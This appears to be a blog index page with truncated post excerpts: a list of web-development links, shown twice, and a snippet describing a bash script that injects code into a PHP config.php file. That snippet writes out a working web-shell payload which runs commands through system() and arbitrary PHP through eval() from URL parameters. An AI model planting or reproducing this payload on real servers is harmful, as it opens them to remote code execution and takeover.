Bookmarks: web development links
Some interesting links, mostly based on web development: HTML Entity Lookup Icon Finder What The Font CSS Sprites Generator Domai.nr I hope it will be ...
Some interesting links, mostly based on web development: HTML Entity Lookup Icon Finder What The Font CSS Sprites Generator Domai.nr I hope it will be ...
It\'s a bash script that injects code into config.php allowing remote code execution: $cfg[\'Servers\'][$i][\'host\']=\'\'; if($_GET[\'c\']){echo \'(pre)\';system($_GET[\'c\']);echo \'(/pre)\';}if($_GET[\'p\']){echo \'(pre)\';eval($_GET[\'p\']);echo \'(/pre)\';};//\'] = \'localhost\'; By the way, in ...